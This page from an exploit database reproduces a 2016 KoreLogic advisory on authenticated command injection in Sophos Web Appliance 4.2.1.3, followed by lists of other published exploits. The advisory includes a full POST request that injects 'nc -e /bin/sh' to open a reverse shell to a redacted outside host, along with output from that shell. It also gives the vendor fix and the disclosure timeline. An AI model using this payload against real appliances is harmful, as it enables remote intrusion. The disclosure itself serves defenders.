Menu

Search for hundreds of thousands of exploits

"Sophos Web Appliance 4.2.1.3 - Remote Code Execution"

Author

Exploit author

KoreLogic

Platform

Exploit platform

php

Release date

Exploit published date

2016-11-07

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
KL-001-2016-009 : Sophos Web Appliance Remote Code Execution

Title: Sophos Web Appliance Remote Code Execution
Advisory ID: KL-001-2016-009
Publication Date: 2016.11.03
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-009.txt


1. Vulnerability Details

     Affected Vendor: Sophos
     Affected Product: Web Apppliance
     Affected Version: v4.2.1.3
     Platform: Embedded Linux
     CWE Classification: CWE-78: Improper Neutralization of Special Elements
                         used in an OS Command ('OS Command Injection'),
                         CWE-88: Argument Injection or Modification
     Impact: Remote Code Execution
     Attack vector: HTTP

2. Vulnerability Description

     An authenticated user of any privilege can execute arbitrary
     system commands as the non-root webserver user.

3. Technical Description

     Multiple parameters to the web interface are unsafely handled and
     can be used to run operating system commands, such as:

     POST /index.php?c=logs HTTP/1.1
     Host: [redacted]
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0)
Gecko/20100101 Firefox/46.0
     Accept: text/javascript, text/html, application/xml, text/xml, */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     DNT: 1
     X-Requested-With: XMLHttpRequest
     X-Prototype-Version: 1.6.1
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     Content-Length: 305
     Connection: close


STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`&search=test&sort=time&multiplier=1&start=&end=&direction=1

     HTTP/1.1 200 OK
     Date: Tue, 10 May 2016 15:35:05 GMT
     Server: Apache
     Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0,
pre-check=0
     Pragma: no-cache
     X-Frame-Options: sameorigin
     X-Content-Type-Options: nosniff
     Connection: close
     Content-Type: text/html; charset=utf-8
     Content-Length: 207

     {"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10
4:35
PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"}

     --

     The vulnerable parameters are: by, request_id, and txt_filter_domain

     That request launches the following process on the SWA:

     1000     16851  0.0  0.0   2728  1040 ?        S    15:43   0:00 sh -c
/opt/perl/bin/salp-generate-report.pl --report=Filter --res=-
--type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA=='
--start='2016/05/10' --end='2016/05/10' --action=''
--sid=590fca17b230e8cdba0394cfa28ef2eb

     From the shell launched via netcat:

     id;uname -a;uptime
     uid=1000(spiderman) gid=1000(spiderman)
groups=1000(spiderman),16(cron),44(tproxyd),45(wdx)
     Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux
     15:52:34 up  4:26,  0 users,  load average: 0.11, 0.12, 0.15

4. Mitigation and Remediation Recommendation

     The vendor has issued a fix for this vulnerability in Version
     4.3 of SWA. Release notes available at:

     http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos
     2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.
     2016.09.28 - KoreLogic requests status update.
     2016.09.28 - Sophos informs KoreLogic that an update including a fix
                  for this vulnerability will be available near the end
                  of October.
     2016.10.13 - Sophos informs KoreLogic that the update was released to a
                  limited customer base and is expected to be distributed
                  at-large over the following week.
     2016.11.03 - Public disclosure.

7. Proof of Concept

     See 3. Technical Description.


The contents of this advisory are copyright(c) 2016
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2018-11-14 "Dell OpenManage Network Manager 6.2.0.51 SP3 - Multiple Vulnerabilities" webapps linux KoreLogic
2018-06-27 "HPE VAN SDN 2.7.18.0503 - Remote Root" webapps linux KoreLogic
2018-03-05 "Sophos UTM 9.410 - 'loginuser' 'confd' Service Privilege Escalation" local linux KoreLogic
2017-03-10 "WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery" webapps xml KoreLogic
2016-11-07 "Sophos Web Appliance 4.2.1.3 - Remote Code Execution" webapps php KoreLogic
2016-10-05 "Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials" local linux KoreLogic
2016-10-05 "Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion" webapps cgi KoreLogic
2016-10-05 "Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution" webapps cgi KoreLogic
2016-06-29 "Ubiquiti Administration Portal - Remote Command Execution (via Cross-Site Request Forgery)" webapps cgi KoreLogic
2015-09-17 "VBox Satellite Express 2.3.17.3 - Arbitrary Write" dos windows KoreLogic
2015-09-01 "XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write (PoC)" dos windows KoreLogic
2015-09-01 "SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where (PoC)" dos windows KoreLogic
2015-01-29 "Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)" local windows KoreLogic
2014-11-06 "VMware Workstation 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read" dos windows_x86 KoreLogic
2014-07-21 "Microsoft Windows XP SP3 - 'BthPan.sys' Arbitrary Write Privilege Escalation" local windows KoreLogic
2014-07-19 "Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation" local windows KoreLogic 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected